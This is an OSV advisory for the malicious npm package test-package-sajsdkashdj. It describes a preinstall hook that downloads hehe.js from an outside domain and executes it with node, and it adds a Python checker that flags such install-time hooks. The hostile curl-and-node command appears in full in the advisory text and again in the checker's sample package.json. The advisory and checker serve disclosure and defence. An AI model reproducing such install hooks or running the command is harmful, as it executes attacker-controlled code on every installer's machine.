MAL-2026-6266

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-package-sajsdkashdj/MAL-2026-6266.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-6266
Published
2026-06-22T17:37:23Z
Modified
2026-06-22T18:31:22.824851717Z
Summary
Malicious code in test-package-sajsdkashdj (npm)
Details

Source: amazon-inspector (62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87)

package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the package downloads JavaScript from poc.amanrawat.com and immediately executes it with node under the installer's privileges. The fetched content is unpinned, unhashed, served from a third-party non-publisher domain, and mutable — whoever controls poc.amanrawat.com can ship arbitrary code to every installer at any time. The package itself contains no functionality beyond this dropper. The package name (test-package-sajsdkashdj) and the fetch target (a path named hehe.js on a personal-looking domain) further indicate this is not a legitimate distribution mechanism.
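The dropper pattern described above (an install-time lifecycle hook that fetches a remote file and hands it straight to node) can be caught before the package runs by inspecting package.json. The checker below is an added example, not part of the OSV record or the amazon-inspector analysis; the sample package.json is constructed here from the script quoted in the advisory, and the hook and command lists are assumptions chosen for illustration.

```python
import json
import re

# Constructed package.json modelled on the advisory: the preinstall script
# downloads a file from a third-party domain and executes it with node.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "test-package-sajsdkashdj",
    "version": "2.1.7",
    "scripts": {
        "preinstall": "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js",
        "test": "echo \"no tests\"",
    },
})

# npm lifecycle hooks that run automatically during `npm install` (assumed list).
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Tools that pull content from the network, and interpreters that would run it.
FETCHERS = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b")
EXECUTORS = re.compile(r"\b(node|sh|bash|python3?|powershell|eval)\b")
URL = re.compile(r"https?://[^\s'\"]+")


def audit_install_scripts(package_json_text):
    """Return (hook, urls, reason) for every install-time lifecycle script
    that reaches out to the network; the reason is escalated when the same
    command also invokes an interpreter, i.e. the download-and-run dropper."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook, cmd in scripts.items():
        if hook not in INSTALL_HOOKS:
            continue  # e.g. "test" only runs when a developer asks for it
        urls = URL.findall(cmd)
        fetches = bool(FETCHERS.search(cmd)) or bool(urls)
        executes = bool(EXECUTORS.search(cmd))
        if fetches and executes:
            findings.append((hook, urls, "downloads remote content and executes it at install time"))
        elif fetches:
            findings.append((hook, urls, "contacts the network at install time"))
    return findings


if __name__ == "__main__":
    for hook, urls, reason in audit_install_scripts(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {reason} ({', '.join(urls)})")
```

Running this against a tarball's package.json before installing, or installing with `npm install --ignore-scripts` and reviewing any flagged hooks by hand, prevents the fetched script from ever executing.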

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "542596accdcd18f95701775537c8d2a26a97a25cc9498a9da490271b05b1d702",
            "id": "IN-MAL-2026-007138",
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:29Z",
            "versions": [
                "2.1.6"
            ],
            "import_time": "2026-06-22T18:25:27.928309737Z"
        },
        {
            "sha256": "62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87",
            "id": "IN-MAL-2026-007137",
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:23Z",
            "versions": [
                "2.1.7"
            ],
            "import_time": "2026-06-22T18:25:27.815597367Z"
        }
    ]
}
References
Credits

Affected packages

npm / test-package-sajsdkashdj

Package

Name
test-package-sajsdkashdj
Purl
pkg:npm/test-package-sajsdkashdj

Affected ranges

Affected versions

2.*
2.1.6
2.1.7

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/test-package-sajsdkashdj/MAL-2026-6266.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "sha256": "bde307751693a74b5da57b277ac43deda04060ba9976804c1aa38579f70ac70f",
            "tlsh": "b3e020308b63523755c41292486fa41fd6919f7f500a7c0c63ab042d80cb57758fe71c",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "test-package-sajsdkashdj-2.1.6.tgz",
            "hashes": {
                "sha1": "5606c5611600aec1314c631503520538aecc6a53",
                "sha512_sri": "sha512-hqsKDcYCc1n8pAXKZwSYKtXXjFKVSoaMqFNHdiLkgNCsdIPsQg8pzzUYUY9+zs4bG09x+71f1O5fmtyD8putVg=="
            }
        }
    ]
}